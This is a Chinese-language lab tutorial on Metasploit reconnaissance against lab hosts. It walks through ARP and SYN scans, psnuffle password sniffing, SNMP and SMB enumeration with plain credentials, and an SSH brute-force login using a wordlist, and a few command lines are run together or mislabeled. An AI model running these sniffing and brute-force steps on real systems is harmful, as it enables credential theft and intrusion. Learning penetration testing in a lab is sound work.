一.使用nmap,auxiliary /sniffer进行信息收集
1.进入Metasploit
msfconsole
2.用db_nmap扫描网关(发现报错,没有连接到数据库)
db_nmap -sV 192.168.60.2
解决方法:执行以下命令
service mysql start #启动 MySQL 数据库服务
service postgresql start #启动postgresql 数据库服务
service metasploit start #启动服务
msfdb reinit #重新初始化 Metasploit 数据库
msfdb start #启动Metasploit数据库服务
msfconsole #进入到Metasploit
3.进行ARP扫描网段
msf6 > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > show options
msf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.60.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 20
msf6 auxiliary(scanner/discovery/arp_sweep) > run
msf6 auxiliary(scanner/discovery/arp_sweep) > back
4.半连接扫描
1.进入模块
msf6 > use auxiliary/scanner/portscan/syn
2.给定参数(目标IP和端口)
msf6 auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.60.2
msf6 auxiliary(scanner/portscan/syn) > set PORTS 80
msf6 auxiliary(scanner/portscan/syn) > set THREADS 20
msf6 auxiliary(scanner/portscan/syn) > run
如图,我的网关80端口是关闭的,扫描53端口,如图是开启的
msf6 auxiliary(scanner/portscan/syn) > set PORTS 53
msf6 auxiliary(scanner/portscan/syn) > run
5.使用auxiliary /sniffer 下的 psnuffle 模块进行密码嗅探
Dsniff 是一个著名的网络嗅探工具包、高级口令嗅探工具、综合性的网络嗅探工具包。
msf6 > search psnuffle
msf6 > info
msf6 auxiliary(sniffer/psnuffle) > show options
直接运行
run
用lftp连接靶机,嗅探成功,用户和密码
该模块一直都会在后台监听,需要关闭
msf6 auxiliary(sniffer/psnuffle) > jobs #查看后台运行
msf6 auxiliary(sniffer/psnuffle) > kill 2 #2是jobs查到的对应id号
二.基于SNMP协议收集主机信息
使用snmp_enum模块。通过SNMP协议扫描目标服务器信息
msf6 >seartch snmp_enum
msf6 >use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > show options
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.145.128
msf6 auxiliary(scanner/snmp/snmp_enum) > show options
msf6 auxiliary(scanner/snmp/snmp_enum) > run
三.基于SMB协议收集主机信息
1.使用smb_version 基于SMB协议扫描版本号
环境:在目标机win7的C盘下创建一个lin_ying的文件夹,并开启共享
右键属性
进入kali开始
msf6 > search smb_version
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.145.128
msf6 auxiliary(scanner/smb/smb_version) > show options
msf6 auxiliary(scanner/smb/smb_version) > run
2.使用smb_enumshares基于SMB协议扫共享文件
msf6 > search smb_enumshares
msf6 > use auxiliary/scanner/smb/smb_enumshares
msf6 auxiliary(scanner/smb/smb_enumshares) > show options
msf6 auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 192.168.145.130
msf6 auxiliary(scanner/smb/smb_enumshares) > set SMBUser administrator
msf6 auxiliary(scanner/smb/smb_enumshares) > set SMBPass 123456
msf6 auxiliary(scanner/smb/smb_enumshares) > run
要指定用户和密码不然找不到
可以看到扫描的结果含有一开始创建的共享文件夹
3.使用smb_lookupsid扫描系统用户信息(SID枚举)
环境:在win10创建一个用户lin_ying
进入到kali开始
msf6 > search smb_lookupsid
msf6 > use auxiliary/scanner/smb/smb_lookupsid
msf6 auxiliary(scanner/smb/smb_lookupsid) > show options
msf6 auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.145.130
msf6 auxiliary(scanner/smb/smb_lookupsid) > set SMBUser administrator
msf6 auxiliary(scanner/smb/smb_lookupsid) > set SMBPass 123456
msf6 auxiliary(scanner/smb/smb_lookupsid) > show optionsmsf6 auxiliary(scanner/smb/smb_lookupsid) > run
四.基于SSH协议收集信息
1.查看ssh版本信息
msf6 > search ssh_version
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > show options
msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.145.128
msf6 auxiliary(scanner/ssh/ssh_version) > run
2.对SSH暴力破解
msf6 > search ssh_login
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_version) > show options
msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.145.128
msf6 auxiliary(scanner/ssh/ssh_version) > show options
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > show optionsmsf6 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
msf6 auxiliary(scanner/ssh/ssh_login) > run